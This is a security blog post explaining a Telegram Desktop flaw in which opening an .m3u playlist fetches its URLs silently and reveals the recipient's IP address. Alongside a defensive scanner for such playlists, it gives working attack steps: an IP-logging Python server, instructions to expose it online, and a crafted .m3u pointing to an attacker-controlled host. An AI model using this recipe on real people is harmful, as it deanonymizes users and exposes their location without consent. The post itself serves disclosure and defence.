Telegram Desktop .m3u File Vulnerability: How Hackers Expose Your IP Address with a Single File
Introduction
Telegram is one of the most popular messaging platforms, known for its security features and privacy focus. However, a recently discovered vulnerability in Telegram Desktop for Windows shows that sending an .m3u file can expose a user’s IP address without their knowledge. Unlike .m3u8 files, which trigger a security warning, .m3u files do not prompt any alerts, leading to potential privacy concerns.
Understanding the Vulnerability
An .m3u file is a playlist format that contains URLs pointing to media files. When Telegram processes an .m3u file, it may automatically fetch the URLs listed in it, making HTTP requests to external servers. If an attacker controls the server, they can log the IP address of the user making the request.
- Telegram Desktop does not warn users when processing .m3u files.
- .m3u files can contain URLs pointing to an attacker-controlled server.
- When Telegram fetches the URL, the user's IP address is exposed to the attacker.
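The core of the issue is that a playlist is a list of locations a media client will contact. The scanner below is an added example (not code from the original post or from Telegram) that parses .m3u/.m3u8 content and reports which entries would cause a network request, distinguishing external hosts from private/loopback addresses; the playlist it scans is constructed for the example and the host name in it is a placeholder.

```python
import ipaddress
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample playlist in the format the post describes; the host is a
# placeholder (.invalid TLD), not a real server.
SAMPLE_M3U = """#EXTM3U
#EXTINF:-1,Test Stream
http://example-attacker.invalid:8080/test
#EXTINF:-1,Local file
C:\\Music\\track.mp3
#EXTINF:-1,LAN stream
http://192.168.1.20/stream.ts
"""

# URL schemes that make a media client open a network connection.
REMOTE_SCHEMES = {"http", "https", "ftp", "rtsp", "rtmp"}


@dataclass
class RemoteEntry:
    url: str
    host: str
    external: bool  # True when the host is not a private/loopback/link-local address


def _is_external(host: str) -> bool:
    """Hostnames are treated as external; IP literals are checked against private ranges."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True  # a DNS name: resolving and fetching it leaks the client's IP
    return not (ip.is_private or ip.is_loopback or ip.is_link_local)


def find_remote_entries(playlist: str) -> list[RemoteEntry]:
    """Return every playlist entry that would make a media client contact a network host."""
    found = []
    for raw in playlist.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # blank lines and #EXTM3U/#EXTINF directives
            continue
        parsed = urlparse(line)
        # Local paths such as C:\Music\track.mp3 parse with no hostname and are skipped.
        if parsed.scheme.lower() in REMOTE_SCHEMES and parsed.hostname:
            found.append(RemoteEntry(line, parsed.hostname, _is_external(parsed.hostname)))
    return found


def should_warn(playlist: str) -> bool:
    """Flag a playlist that references any host outside private/loopback ranges."""
    return any(entry.external for entry in find_remote_entries(playlist))
```

Running the check on a received playlist before it is opened gives a user or a mail/chat gateway the warning that, per the post, Telegram Desktop shows for .m3u8 but not for .m3u.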
How the Vulnerability Works
What Happens When an .m3u File is Sent?
- A user sends an .m3u file via Telegram Desktop.
- The recipient opens the file on their Telegram Desktop application.
- Telegram automatically processes the file and fetches the listed media URL.
- If the URL points to an attacker-controlled server, the recipient’s IP address is logged without their knowledge.
Steps to Understand and Test the Vulnerability
1. Set Up a Server to Log IP Addresses
To log incoming HTTP requests, we need a simple web server.
Option 1: Use a Python HTTP Server
```python
import http.server
import socketserver

PORT = 8080


class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Record the address of the client that fetched the playlist entry.
        client_ip = self.client_address[0]
        print(f"Request from IP: {client_ip}")
        with open("ip_log.txt", "a") as f:
            f.write(f"IP: {client_ip}\n")
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Hello, this is a test response!")


with socketserver.TCPServer(("", PORT), RequestHandler) as httpd:
    print(f"Server running on port {PORT}")
    httpd.serve_forever()
```
Run this script on a machine with a public IP or use a service like ngrok to expose it online.
Option 2: Use a Cloud Server
- Deploy a simple web server on a VPS (e.g., AWS, DigitalOcean, Linode).
- Configure the server to log incoming requests.
2. Create an .m3u File
Create a file named test.m3u with the following content:
```
#EXTM3U
#EXTINF:-1,Test Stream
http://<your-server-ip-or-ngrok-url>:8080/test
```
Replace <your-server-ip-or-ngrok-url> with your actual server URL.